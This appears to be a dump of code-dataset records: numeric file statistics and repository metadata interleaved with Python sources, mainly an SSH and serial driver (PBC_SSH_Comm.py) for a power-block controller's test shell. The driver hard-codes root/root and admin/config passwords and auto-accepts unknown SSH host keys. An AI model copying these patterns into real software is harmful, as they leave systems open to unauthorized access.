    # Fixed wrong doctest outputs: str.lower() cannot return mixed case
    # such as "Hello_HTML_world"; also quoted the expected strings.
    return text.lower()
def upper(text: str, *args, **kwargs) -> str:
    """Return text in UPPERCASE style.

    This is a convenience function wrapping inbuilt upper().
    It features the same signature as other conversion functions.
    Note: Acronyms are not being honored.

    Args:
        text (str): Input string to be converted
        args : Placeholder to conform to common signature
        kwargs : Placeholder to conform to common signature

    Returns:
        str: Case converted text

    Examples:
        >>> upper("hello_world")
        'HELLO_WORLD'
        >>> upper("helloHTMLWorld", ["HTML"])
        'HELLOHTMLWORLD'
    """
    # Fixed wrong doctest outputs: str.upper() cannot return mixed case
    # such as "Hello_HTML_world"; also quoted the expected strings.
    return text.upper()
def title(text: str, *args, **kwargs) -> str:
    """Return text in Title_Case style.

    This is a convenience function wrapping inbuilt title().
    It features the same signature as other conversion functions.
    Note: Acronyms are not being honored.

    Args:
        text (str): Input string to be converted
        args : Placeholder to conform to common signature
        kwargs : Placeholder to conform to common signature

    Returns:
        str: Case converted text

    Examples:
        >>> title("hello_world")
        'Hello_World'
        >>> title("helloHTMLWorld", ["HTML"])
        'Hellohtmlworld'
    """
    # Fixed wrong doctest outputs: str.title() treats "_" as a word
    # boundary ('Hello_World') and lowercases letters after the first
    # in each word ('Hellohtmlworld'); also quoted the expected strings.
    return text.title()
def capital(text: str, *args, **kwargs) -> str:
    """Return text in Capital case style.

    This is a convenience function wrapping inbuilt capitalize().
    It features the same signature as other conversion functions.
    Note: Acronyms are not being honored.

    Args:
        text (str): Input string to be converted
        args : Placeholder to conform to common signature
        kwargs : Placeholder to conform to common signature

    Returns:
        str: Case converted text

    Examples:
        >>> capital("hello_world")
        'Hello_world'
        >>> capital("helloHTMLWorld", ["HTML"])
        'Hellohtmlworld'
    """
    # Fixed wrong doctest outputs: str.capitalize() uppercases only the
    # first character and lowercases the rest ('Hello_world', not
    # 'HELLO_WORLD'); also quoted the expected strings.
    return text.capitalize()
| 26.609091
| 75
| 0.61075
| 1,061
| 8,781
| 4.983035
| 0.089538
| 0.03972
| 0.083223
| 0.045394
| 0.822016
| 0.819368
| 0.812748
| 0.779081
| 0.724608
| 0.685833
| 0
| 0.000314
| 0.274001
| 8,781
| 329
| 76
| 26.68997
| 0.82902
| 0.651862
| 0
| 0.304348
| 0
| 0
| 0.004492
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.326087
| false
| 0
| 0.043478
| 0
| 0.695652
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
798a815aa120afe24209666491527feb1355ccc6
| 100
|
py
|
Python
|
core/auth/local/__init__.py
|
yeti-threatintel/yeti
|
9e8b76cd393f149c4990ead003902eac50c1766d
|
[
"Apache-2.0"
] | 1,250
|
2017-03-12T16:20:47.000Z
|
2022-03-29T02:12:11.000Z
|
core/auth/local/__init__.py
|
yeti-threatintel/yeti
|
9e8b76cd393f149c4990ead003902eac50c1766d
|
[
"Apache-2.0"
] | 540
|
2017-03-20T16:45:35.000Z
|
2022-03-22T16:55:02.000Z
|
core/auth/local/__init__.py
|
yeti-threatintel/yeti
|
9e8b76cd393f149c4990ead003902eac50c1766d
|
[
"Apache-2.0"
] | 293
|
2017-03-20T13:59:07.000Z
|
2022-03-28T16:00:10.000Z
|
from core.auth.local.views import auth
from core.auth.local.user_management import get_default_user
| 33.333333
| 60
| 0.86
| 17
| 100
| 4.882353
| 0.588235
| 0.192771
| 0.289157
| 0.409639
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08
| 100
| 2
| 61
| 50
| 0.902174
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8de0c41b3cf54e7ac5de2e315b41f7a9ca776f53
| 321
|
py
|
Python
|
mmdeploy/codebase/mmdet3d/models/__init__.py
|
xizi/mmdeploy
|
6f0569156cd93412e4571ccfb6f0c4fbbacf3cdc
|
[
"Apache-2.0"
] | 746
|
2021-12-27T10:50:28.000Z
|
2022-03-31T13:34:14.000Z
|
mmdeploy/codebase/mmdet3d/models/__init__.py
|
xizi/mmdeploy
|
6f0569156cd93412e4571ccfb6f0c4fbbacf3cdc
|
[
"Apache-2.0"
] | 253
|
2021-12-28T05:59:13.000Z
|
2022-03-31T18:22:25.000Z
|
mmdeploy/codebase/mmdet3d/models/__init__.py
|
xizi/mmdeploy
|
6f0569156cd93412e4571ccfb6f0c4fbbacf3cdc
|
[
"Apache-2.0"
] | 147
|
2021-12-27T10:50:33.000Z
|
2022-03-30T10:44:20.000Z
|
# Copyright (c) OpenMMLab. All rights reserved.
from .base import * # noqa: F401,F403
from .centerpoint import * # noqa: F401,F403
from .mvx_two_stage import * # noqa: F401,F403
from .pillar_encode import * # noqa: F401,F403
from .pillar_scatter import * # noqa: F401,F403
from .voxelnet import * # noqa: F401,F403
| 40.125
| 48
| 0.719626
| 46
| 321
| 4.934783
| 0.434783
| 0.264317
| 0.370044
| 0.475771
| 0.537445
| 0.246696
| 0
| 0
| 0
| 0
| 0
| 0.135338
| 0.17134
| 321
| 7
| 49
| 45.857143
| 0.718045
| 0.439252
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8dec6f5db108207f66e53e121ed45ad5391ae9ba
| 32,925
|
py
|
Python
|
PBC_SSH_Comm.py
|
scatelani-cpi/PBC_Chassis-Shell
|
f469774477c6854c2d646c6e6cd3b4f5ebd593fa
|
[
"MIT"
] | null | null | null |
PBC_SSH_Comm.py
|
scatelani-cpi/PBC_Chassis-Shell
|
f469774477c6854c2d646c6e6cd3b4f5ebd593fa
|
[
"MIT"
] | null | null | null |
PBC_SSH_Comm.py
|
scatelani-cpi/PBC_Chassis-Shell
|
f469774477c6854c2d646c6e6cd3b4f5ebd593fa
|
[
"MIT"
] | null | null | null |
import serial
import json
import paramiko
import os
import sys
import time
import re
import logging
'''
PBC SSH Driver v2021-0620-r1
'''
class PBC_Ser(object):
    """Serial-console driver for the PBC.

    Opens the given COM port at a fixed 115200 baud and provides helpers
    to log in on the console, enable SSH access by adding a link-local IP
    on br0, and enter/exit the chassis-shell CLI.  Timing (``time.sleep``)
    between writes is part of the protocol with the console.
    """
    def __init__(self, serial_comport: str):
        # serial_comport: e.g. 'COM3' or '/dev/ttyUSB0'; baud is fixed.
        self.serialcom = serial.Serial(serial_comport, 115200)
    def send_data(self, data_out: str):
        """Encode *data_out* and write it to the port, then pause briefly."""
        self.data = data_out
        self.serialcom.write(self.data.encode())
        time.sleep(.1)
    def close(self):
        """Release the serial port."""
        self.serialcom.close()
        time.sleep(.1)
    def enable_ssh(self):
        """Exit the PBC console, log in as root and add a link-local IP on br0."""
        # last_ip = input('Input last IP address in hex <xxxx> for UUT:')
        # while not last_ip:
        # last_ip = input('Input last IP address in hex <xxxx> for UUT:')
        self.pbc_console_login()
        self.pbc_console_exit()
        print(f'Please wait, exiting PBC console...')
        # self.send_data("\r")
        # time.sleep(1)
        # self.send_data("\r")
        # time.sleep(.5)
        self.send_data("root\r")
        time.sleep(.5)
        self.send_data("root\r")
        time.sleep(1)
        self.send_data("ip addr add fe80::ffd2:8387:281b:1074/255.255.255.0 dev br0\r")
        time.sleep(1)
        print(f'Your PBC IP address is: fe80::ffd2:8387:281b:1074')
    def enable_ssh_2(self):
        """Variant of enable_ssh() that logs in via admin/config and sudo."""
        # last_ip = input('Input last IP address in hex <xxxx> for UUT:')
        # while not last_ip:
        # last_ip = input('Input last IP address in hex <xxxx> for UUT:')
        # self.pbc_console_login()
        # self.pbc_console_exit()
        # self.pbc_console_exit()
        # self.pbc_console_exit()
        print(f'Please wait, exiting PBC console...')
        self.send_data("admin\r")
        time.sleep(1)
        self.send_data("config\r")
        time.sleep(.5)
        self.send_data("sudo -s\r")
        time.sleep(.5)
        self.send_data("config\r")
        time.sleep(1)
        self.send_data("ip addr add fe80::ffd2:8387:281b:1074/255.255.255.0 dev br0\r")
        time.sleep(1)
        print(f'Your PBC IP address is: fe80::ffd2:8387:281b:1074')
    def pbc_console_login(self):
        # Default console credentials: root / root.
        self.send_data('root\r')
        self.send_data('root\r')
    def pbc_console_exit(self):
        self.send_data('\x03')  # send ctrl + c key
        self.send_data('exit\r')
        time.sleep(9)  # Must wait for console exit
    def enter_chassis_shell(self):
        self.send_data("chassis-shell\r")
    def exit_chassis_shell(self):
        self.send_data('\x03')  # send ctrl + c key
    def return_chassis_shell_root(self):
        self.send_data('/\r')  # go back to the chassis-shell root directory
class PBC_SSH(object):
    """Paramiko SSH driver for the PBC chassis-shell CLI.

    Connects on port 22 as root/root, opens an interactive shell channel,
    and drives the chassis-shell by sending command strings via
    ``process_channel`` and reading back whatever the channel has
    buffered.  The ``time.sleep`` calls pace the remote console and are
    part of the protocol.
    """
    def __init__(self, addr: str):
        # self.port = 22
        # self.user = 'root'
        # self.password = 'root'
        # self.timeout = 23
        self.response = str()
        self.match = str()
        self.ssh = paramiko.SSHClient()
        self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        # NOTE(review): credentials are hard-coded to root/root; see
        # PBC_SSH_2 for the password-parameterized variant.
        self.ssh.connect(addr, 22, 'root', 'root')
        self.channel = self.ssh.invoke_shell()
        self._logger = logging.getLogger(self.__class__.__name__)
    def pbc_comm_test(self):
        """performing this test will login to chassis-shell CLI"""
        # True when the chassis-shell prompt ("/>") is seen in the reply.
        if self.process_channel("chassis-shell\r").find("/>") == -1:
            return False
        else:
            return True
    def pbc_end_connection(self):
        # Close the underlying SSH transport.
        self.ssh.close()
    def json_from_s(self, s):
        """Extract and parse the first JSON-looking object/array in *s*, else None."""
        self.match = re.findall(r"{.+[:,].+}|\[.+[,:].+\]", s)
        return json.loads(self.match[0]) if self.match else None
    def process_channel(self, input):
        """Send *input* on the shell channel; return any buffered reply text."""
        self.channel_data = str()
        self.host = str()
        self.scrfile = str()
        time.sleep(.5)
        self.channel.send(input)
        time.sleep(1.5)
        if self.channel.recv_ready():
            self.channel_data += str(self.channel.recv(9999).decode("utf8"))
            # print(self.channel_data)
            self._logger.info(self.channel_data)
        return self.channel_data
    # ######################### Communication Test ###########################
    def can_dump(self):
        # Dump CAN traffic for 5s, then ctrl-c the candump process.
        self.process_channel("candump can0 | grep 7[0-9]\r")
        time.sleep(5)
        self.process_channel("\x03")
    # ######################### EMB Tests ###########################
    def pbc_console_login_old(self):
        self.process_channel('root\r')
        self.process_channel('root\r')
    def pbc_console_login(self):
        # self.process_channel('admin\r')
        # time.sleep(.5)
        # self.process_channel('config\r')
        # time.sleep(.5)
        self.process_channel('sudo -s\r')
        time.sleep(.5)
        self.process_channel('config\r')
    def pbc_console_exit(self):
        self.process_channel('\x03')  # send ctrl + c key
        self.process_channel('exit\r')
    def enter_chassis_shell(self):
        self.process_channel("chassis-shell\r")
    def exit_chassis_shell(self):
        self.process_channel('\x03')  # send ctrl + c key
    def return_chassis_shell_root(self):
        self.process_channel('/\r')  # go back to the chassis-shell root directory
    def platform_sw_version(self):
        self.process_channel("/\r")
        self.process_channel("/Platform\r")
        self.process_channel("/PowerMonitor/board-rev\r")
    def init_all_can(self, evt: bool):  # Include the PM --no-detect bypass, must remove for DVT
        self.process_channel("CCB can0\r")
        self.process_channel("AUXPS can0\r")
        self.process_channel("/PM\r")
        if evt: self.pm_no_detect()
        for i in range(1, 6):
            self.process_channel('/PM/PM' + str(i) + ' can0\r')
    def init_all_pm(self):
        self.process_channel('/\r')
        self.process_channel('/PM\r')
        for i in range(1, 6):
            self.process_channel('PM' + str(i) + ' can0\r')
    def pm_init(self, pm):
        self.process_channel('/\r')
        self.process_channel('/PM\r')
        self.process_channel('PM' + str(pm) + ' can0\r')
        print(f'\nWating for PM{pm} to come online...')
        time.sleep(6)
    def get_temps(self):
        self.process_channel("/\r")
        self.process_channel("/TempSensor/TEMP1\r")
        self.process_channel("/CCB/temps\r")
        time.sleep(1)
        self.process_channel("/AUXPS/temps\r")
        time.sleep(1)
        self.process_channel("/PowerMonitor/temp 0\r")  # Powermonitor read DRY-Zone RTD temp read on C
        time.sleep(1)
    def toggle_all_pm(self):
        self.process_channel("/\r")
        for i in range(1, 6):
            self.process_channel('/PM/PM' + str(i) + ' op\r')
            time.sleep(.5)
    def show_pm_status(self, pm):
        self.process_channel("/\r")
        self.process_channel("/PM\r")
        self.process_channel("PM" + str(pm) + "\r")
    # ################### PBC LV Tests #########################
    def ext_chassis_led(self, r, g):
        if r == 1:
            self.process_channel("/ExtChassisLed/RED1 1\r")  # Set RED ON
        if r == 0:
            self.process_channel("/ExtChassisLed/RED1 0\r")  # Set RED OFF
        if g == 1:
            self.process_channel("/ExtChassisLed/GREEN1 1\r")  # Set GREEN ON
        if g == 0:
            self.process_channel("/ExtChassisLed/GREEN1 0\r")  # Set GREEN OFF
    def dry_zone_fan(self, fan, speed, enable):
        self.process_channel("/Fan/DRY-Zone-" + str(fan) + "\r")  # Enter PBC Fan directory
        self.process_channel("speed " + str(speed) + "\r")  # Set PBC Fan speed
        time.sleep(1.5)
        self.process_channel("power " + str(enable) + "\r")  # Set PBC Fan enable
        time.sleep(1.5)
        self.process_channel("\r")  # Status PBC Fan
    def dry_zone_one_fan_ctrl(self, fan, sp_else_pwr, enable):
        self.process_channel("/Fan/DRY-Zone-" + str(fan) + "\r")  # Enter PBC Fan directory
        if sp_else_pwr:
            sp = "100" if enable else "0"
            self.process_channel("speed " + str(sp) + "\r")  # Set PBC Fan speed
            time.sleep(.25)
        if not sp_else_pwr:
            self.process_channel("power " + str(enable) + "\r")  # Set PBC Fan enable
            time.sleep(.25)
        self.process_channel("\r")  # Status PBC Fan
        # time.sleep(.5)
    def dry_zone_fan_current(self, fan):  # DRY-Zone fan currents Powermonitor read DRY-Zone fan 1 and 2
        self.process_channel("/PowerMonitor/fan " + str(fan) + "\r")  # Powermonitor read DRY-Zone fan 1
    def gpio_expander(self):
        self.process_channel("/\r")
        self.process_channel("/GpioExpander\r")  # Read GpioExpander status
    def safety_sw(self, category):
        self.process_channel("/Reed\r")
        if category == 'thermal':
            self.process_channel("/ThermalSw\r")  # Read ThermalSw status
        if category == 'reed':
            self.process_channel("/Reed\r")
        if category == 'reed1':
            self.process_channel("REED1-DoorWetBoxFront\r")
        if category == 'surge':
            self.process_channel("/SurgeDet\r")
    # def pm_present_can_id():
    # toggle_all_pm()
    # show_pm_status()
    # CCB Tests
    def ccb_init(self):
        self.process_channel('\x03')  # send ctrl + c key
        self.enter_chassis_shell()
        self.process_channel("/CCB can0\r")
        time.sleep(1)
        # self.process_channel("/CCB op\r")
    def ccb_info(self):
        self.process_channel("/\r")
        self.process_channel("/CCB\r")
    def ccb_read_logs(self):  #
        self.process_channel(".quit\r")
        self.process_channel("cat /var/log/CCB-selftest.log\r")  # read dump
    def ccb_bl_fw_version(self):
        self.process_channel("/CCB/bootversion\r")
        self.process_channel("/CCB/appversion\r")
    def ccb_fault_info(self):
        self.process_channel("/CCB/faultInfo\r")
    def ccb_fan_bank_info(self, fanBank):
        if fanBank == 1:
            self.process_channel("/CCB/fanBank1\r")
        if fanBank == 2:
            self.process_channel("/CCB/fanBank2\r")
        if fanBank == 3:
            self.process_channel("/CCB/fanBank3\r")
    def ccb_pump_info(self):
        self.process_channel("/CCB/pump\r")
    def ccb_self_test(self):  # must run before trying to poll for CCB faults in ccb_fault_info()
        self.process_channel("/CCB/selfTest\r")
    def ccb_coolant_level(self):  # must run while filling up coolant tank
        self.process_channel("/CCB/coolantLevel\r")
    def ccb_fan_speed(self, b_num, f_speed):  # <bank_number> <speed 0-100> set fan-bank speed
        self.process_channel("/CCB/fanspeed " + str(b_num) + " " + str(f_speed) + "\r")  # Set CCB Fan speed
        time.sleep(1)
    def ccb_pump_speed(self, p_speed):  # <speed 0-100> set pump speed
        self.process_channel("/CCB/pumpspeed " + " " + str(p_speed) + "\r")  # Set CCB pump speed
        time.sleep(1)
    # Close Loop Thermal Control
    def autoThermal(self, poll, log_freq):  # <bank_number> <speed 0-100> set fan-bank speed
        self.process_channel("/PowerBlock/autoThermal " + str(poll) + "\r")  # Set to close loop and poll freq
        time.sleep(1)
        self.process_channel("/PowerBlock/logInfo " + str(log_freq) + "\r")  # Set to log freq in sec, default 5 sec
        time.sleep(1)
    # AUXPS Tests
    def auxps_info(self):
        # self.process_channel("/\r")
        self.process_channel("/AUXPS\r")
    def auxps_init(self):
        self.process_channel("/\r")
        self.process_channel("/AUXPS can0\r")
    def auxps_read_logs(self):  #
        self.process_channel(".quit\r")
        time.sleep(1)
        self.process_channel("cat /var/log/AuxPS-selftest.log\r")  # read dump
    def auxps_remove_logs(self):  #
        self.process_channel(".quit\r")
        time.sleep(1)
        self.process_channel("rm -v /var/log/AuxPS-selftest.log\r")  # read dump
    def auxps_bl_fw_version(self):
        self.process_channel("/AUXPS/bootversion\r")
        self.process_channel("/AUXPS/appversion\r")
    def auxps_fault_info(self):
        self.process_channel("/AUXPS/faults\r")
    def auxps_bank_info(self, auxBank):
        # Returns parsed JSON for the requested bank, or None (falls
        # through) when auxBank matches none of the known names.
        if auxBank == 'ccb':
            return self.json_from_s(self.process_channel("/AUXPS/CCBChannel\r"))
        if auxBank == 'pbc':
            return self.json_from_s(self.process_channel("/AUXPS/PBCChannel\r"))
        if auxBank == 'ext':
            return self.json_from_s(self.process_channel("/AUXPS/ExtChannel\r"))
        if auxBank == 'input':
            return self.json_from_s(self.process_channel("/AUXPS/InputChannel\r"))
    def auxps_channel_ctrl(self, ch: str, set_to: str):  # <ccb|pbc|ext> <0-3> 0:enable, 1:disable
        self.process_channel(f"/AUXPS/channelCtrl {ch} {set_to}\r")
        if ch == 'ccb':
            return self.json_from_s(self.process_channel("/AUXPS/CCBChannel\r"))
        if ch == 'pbc':
            return self.json_from_s(self.process_channel("/AUXPS/PBCChannel\r"))
        if ch == 'ext':
            return self.json_from_s(self.process_channel("/AUXPS/ExtChannel\r"))
    def auxps_self_test(self):  # must run before trying to poll for AUXPS faults in AUXPS_fault_info()
        self.process_channel("/AUXPS/selfTest\r")
    def auxps_shunt_ctrl(self, s_state):  #
        self.process_channel("/AUXPS/shuntControl " + str(s_state) + "\r")
    def auxps_fan_speed(self, af_speed):  # <speed 0-100> set fan speed
        return self.json_from_s(self.process_channel("/AUXPS/fanspeed " + str(af_speed) + "\r"))  # Set AUXPS Fan speed
    def auxps_fan_info(self):  # <speed 0-100>, <rpm>
        # self.response = self.process_channel("/AUXPS/fanstatus\r")  # SGet auxps Fan speed
        # time.sleep(1)
        # return self.json_from_s(self.response)
        return self.json_from_s(self.process_channel("/AUXPS/fanstatus\r"))  # SGet auxps Fan speed
    def auxps_autoPowerCycle(self, seconds):  # <seconds> Set auto power-cycle timeout on CAN/HB miss (current: 0sec)
        self.process_channel("/AUXPS/autoPowerCycle " + str(seconds) + "\r")  #
        time.sleep(1)
    def auxps_temps(self, humidity=False, dewpoint=False):
        # self.process_channel("/AUXPS/temps\r")  #
        # time.sleep(1)
        if humidity: self.process_channel("/AUXPS/humidity\r")  #
        if dewpoint: self.process_channel("/AUXPS/dewpoint\r")  #
        return self.json_from_s(self.process_channel("/AUXPS/temps\r"))
    def auxps_input_channel_info(self):  # show all 3x input channels
        return self.json_from_s(self.process_channel("/AUXPS/InputChannel\r"))
    # PM Power Control
    def pm_no_detect(self):  #
        self.process_channel("/\r")
        self.process_channel("/PM\r")
        self.process_channel("--no-detect\r")  # set PBC to no MPx GPIO pin detect
        time.sleep(1)
    def pm_bl_fw_version(self, pm):
        self.process_channel("/PM/PM" + str(pm) + "/bootversion\r")
        self.process_channel("/PM/PM" + str(pm) + "/appversion\r")
    # def pm_pwr_ctrl(self, pm, bus, volts, amps):  # <a|b|0> <volts> <amps> [maxvolts] Set pm output bus/volts/amps
    # self.process_channel("/PM/PM" + str(pm) + "/setTargets " + str(bus) + " " + str(volts) + " " + str(amps) + "\r")
    # time.sleep(1)
    def pm_pwr_ctrl(self, pm, bus, volts, amps):  # <a|b|0> <volts> <amps> [maxvolts] Set pm output bus/volts/amps
        self.process_channel("/\r")
        self.process_channel(f"/PM/PM{pm}\r")
        # self.process_channel("/PM/PM" + str(pm) + " \r")
        self.process_channel(f"setTargets {bus} {volts} {amps}\r")
        time.sleep(2)
        self.process_channel("\r")
        self.process_channel("/\r")
    #### BK Test
    def bk_pwr_ctrl(self, state):
        # self._res_manager.write(b"OUTPut ON\r\n")
        if state == 1:
            self.process_channel("OUTPut ON\n")
        if state == 0:
            self.process_channel("OUTPut OFF\n")
        time.sleep(1)
    # Burn-in test
    def pb_bi_test(self, bus: str, volts: str, amps: str, pm1_5: bool):
        # NOTE(review): PBC_SSH defines no enable_ssh() method (only
        # PBC_Ser does) — this call looks like it would raise
        # AttributeError at runtime; confirm intended class.
        if pm1_5:
            power_kw = '200'  # set 200kW max power if PM 1.5
        else:
            power_kw = '156'
        self.pbc_console_login()
        self.enable_ssh()
        time.sleep(1)
        self.process_channel(f"test-pnode -r {bus} {power_kw}\r")  #
        time.sleep(1)
        self.process_channel(f"test-pnode {bus} {volts} {amps}\r")  # < a | b > < powerkw >
        time.sleep(1)
class PBC_SSH_2(object):
"""A copy of PBC_SSH with the addition of login password support for EMB plat version > 177 """
def __init__(self, addr: str, user='admin', password='config'):
# self.port = 22
# self.user = 'root'
# self.password = 'root'
# self.timeout = 23
self.response = str()
self.match = str()
self.ssh = paramiko.SSHClient()
self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.ssh.connect(addr, 22, user, password)
self.channel = self.ssh.invoke_shell()
self._logger = logging.getLogger(self.__class__.__name__)
def pbc_file_transfer(self, localpath='none', targetpath='none', direction='up'):
sftp = self.ssh.open_sftp()
if direction == 'up':
print('wait for file transfer')
sftp.put(localpath, targetpath)
if direction == 'down':
print('wait for file transfer')
sftp.get(targetpath, localpath)
time.sleep(1)
sftp.close()
def pbc_comm_test(self):
"""performing this test will login to chassis-shell CLI"""
self.pbc_console_login()
if self.process_channel("chassis-shell\r").find("/>") == -1:
return False
else:
return True
def pbc_end_connection(self):
self.ssh.close()
def json_from_s(self, s):
self.match = re.findall(r"{.+[:,].+}|\[.+[,:].+\]", s)
return json.loads(self.match[0]) if self.match else None
def process_channel(self, input):
self.channel_data = str()
self.host = str()
self.scrfile = str()
time.sleep(.5)
self.channel.send(input)
time.sleep(1.5)
if self.channel.recv_ready():
self.channel_data += str(self.channel.recv(9999).decode("utf8"))
# print(self.channel_data)
self._logger.info(self.channel_data)
return self.channel_data
# ######################### Communication Test ###########################
def can_dump(self):
self.process_channel("candump can0 | grep 7[0-9]\r")
time.sleep(5)
self.process_channel("\x03")
# ######################### EMB Tests ###########################
def pbc_console_login_old(self):
self.process_channel('root\r')
self.process_channel('root\r')
def pbc_console_login(self):
# self.process_channel('admin\r')
# time.sleep(.5)
# self.process_channel('config\r')
# time.sleep(.5)
self.process_channel('sudo -s\r')
time.sleep(.5)
if self.process_channel('config\r').find("root@") == -1:
return False
return True
def pbc_console_exit(self):
self.process_channel('\x03') # send ctrl + c key
self.process_channel('exit\r')
def enter_chassis_shell(self):
self.process_channel("chassis-shell\r")
def exit_chassis_shell(self):
self.process_channel('\x03') # send ctrl + c key
def return_chassis_shell_root(self):
self.process_channel('/\r') # send ctrl + c key
def platform_sw_version(self):
self.process_channel("/\r")
self.process_channel("/Platform\r")
self.process_channel("/PowerMonitor/board-rev\r")
plat_read = self.process_channel("/Platform/EMB_PLATFORM_VERSION\r").split(" ")
self._logger.info(f'UUT Platform version read: {plat_read[1]}')
return plat_read[1]
def init_all_can(self, evt: bool): # Include the PM --no-detect bypass, must remove for DVT
self.process_channel("CCB can0\r")
self.process_channel("AUXPS can0\r")
self.process_channel("/PM\r")
if evt: self.pm_no_detect()
for i in range(1, 6):
self.process_channel('/PM/PM' + str(i) + ' can0\r')
def init_all_pm(self):
self.process_channel('/\r')
self.process_channel('/PM\r')
for i in range(1, 6):
self.process_channel('PM' + str(i) + ' can0\r')
def pm_init(self, pm):
self.process_channel('/\r')
self.process_channel('/PM\r')
self.process_channel('PM' + str(pm) + ' can0\r')
print(f'\nWating for PM{pm} to come online...')
time.sleep(6)
def get_temps(self):
self.process_channel("/\r")
self.process_channel("/TempSensor/TEMP1\r")
self.process_channel("/CCB/temps\r")
time.sleep(1)
self.process_channel("/AUXPS/temps\r")
time.sleep(1)
self.process_channel("/PowerMonitor/temp 0\r") # Powermonitor read DRY-Zone RTD temp read on C
time.sleep(1)
def toggle_all_pm(self):
self.process_channel("/\r")
for i in range(1, 6):
self.process_channel('/PM/PM' + str(i) + ' op\r')
time.sleep(.5)
def show_pm_status(self, pm):
self.process_channel("/\r")
self.process_channel("/PM\r")
self.process_channel("PM" + str(pm) + "\r")
# ################### PBC LV Tests #########################
def ext_chassis_led(self, r, g):
if r == 1:
self.process_channel("/ExtChassisLed/RED1 1\r") # Set GREEN ON
if r == 0:
self.process_channel("/ExtChassisLed/RED1 0\r") # Set GREEN ON
if g == 1:
self.process_channel("/ExtChassisLed/GREEN1 1\r") # Set GREEN ON
if g == 0:
self.process_channel("/ExtChassisLed/GREEN1 0\r") # Set GREEN ON
def dry_zone_fan(self, fan, speed, enable):
self.process_channel("/Fan/DRY-Zone-" + str(fan) + "\r") # Enter PBC Fan directory
self.process_channel("speed " + str(speed) + "\r") # Set PBC Fan speed
time.sleep(1.5)
self.process_channel("power " + str(enable) + "\r") # Set PBC Fan enable
time.sleep(1.5)
self.process_channel("\r") # Status PBC Fan
def dry_zone_one_fan_ctrl(self, fan, sp_else_pwr, enable):
self.process_channel("/Fan/DRY-Zone-" + str(fan) + "\r") # Enter PBC Fan directory
if sp_else_pwr:
sp = "100" if enable else "0"
self.process_channel("speed " + str(sp) + "\r") # Set PBC Fan speed
time.sleep(.25)
if not sp_else_pwr:
self.process_channel("power " + str(enable) + "\r") # Set PBC Fan enable
time.sleep(.25)
self.process_channel("\r") # Status PBC Fan
# time.sleep(.5)
def dry_zone_fan_current(self, fan): # DRY-Zone fan currents Powermonitor read DRY-Zone fan 1 and 2
self.process_channel("/PowerMonitor/fan " + str(fan) + "\r") # Powermonitor read DRY-Zone fan 1
def gpio_expander(self):
self.process_channel("/\r")
self.process_channel("/GpioExpander\r") # Read GpioExpander status
def safety_sw(self, category):
self.process_channel("/Reed\r")
if category == 'thermal':
self.process_channel("/ThermalSw\r") # Read ThermalSw status
if category == 'reed':
self.process_channel("/Reed\r")
if category == 'reed1':
self.process_channel("REED1-DoorWetBoxFront\r")
if category == 'surge':
self.process_channel("/SurgeDet\r")
# def pm_present_can_id():
# toggle_all_pm()
# show_pm_status()
# CCB Tests
def ccb_init(self):
self.process_channel('\x03') # send ctrl + c key
self.enter_chassis_shell()
self.process_channel("/CCB can0\r")
time.sleep(1)
# self.process_channel("/CCB op\r")
def ccb_info(self):
self.process_channel("/\r")
self.process_channel("/CCB\r")
def ccb_read_logs(self): #
self.process_channel(".quit\r")
self.process_channel("cat /var/log/CCB-selftest.log\r") # read dump
def ccb_bl_fw_version(self):
self.process_channel("/CCB/bootversion\r")
self.process_channel("/CCB/appversion\r")
def ccb_fault_info(self):
self.process_channel("/CCB/faultInfo\r")
def ccb_fan_bank_info(self, fanBank):
if fanBank == 1:
self.process_channel("/CCB/fanBank1\r")
if fanBank == 2:
self.process_channel("/CCB/fanBank2\r")
if fanBank == 3:
self.process_channel("/CCB/fanBank3\r")
def ccb_pump_info(self):
self.process_channel("/CCB/pump\r")
def ccb_self_test(self): # must run before trying to poll for CCB faults in ccb_fault_info()
self.process_channel("/CCB/selfTest\r")
def ccb_coolant_level(self): # must run while filling up coolant tank
self.process_channel("/CCB/coolantLevel\r")
def ccb_fan_speed(self, b_num, f_speed): # <bank_number> <speed 0-100> set fan-bank speed
self.process_channel("/CCB/fanspeed " + str(b_num) + " " + str(f_speed) + "\r") # Set CCB Fan speed
time.sleep(1)
def ccb_pump_speed(self, p_speed): # <speed 0-100> set pump speed
self.process_channel("/CCB/pumpspeed " + " " + str(p_speed) + "\r") # Set CCB pump speed
time.sleep(1)
# Close Loop Thermal Control
def autoThermal(self, poll, log_freq): # <bank_number> <speed 0-100> set fan-bank speed
self.process_channel("/PowerBlock/autoThermal " + str(poll) + "\r") # Set to close loop and poll freq
time.sleep(1)
self.process_channel("/PowerBlock/logInfo " + str(log_freq) + "\r") # Set to log freq in sec, default 5 sec
time.sleep(1)
# AUXPS Tests
def auxps_info(self):
# self.process_channel("/\r")
self.process_channel("/AUXPS\r")
def auxps_init(self):
self.process_channel("/\r")
self.process_channel("/AUXPS can0\r")
def auxps_read_logs(self): #
self.process_channel(".quit\r")
time.sleep(1)
self.process_channel("cat /var/log/AuxPS-selftest.log\r") # read dump
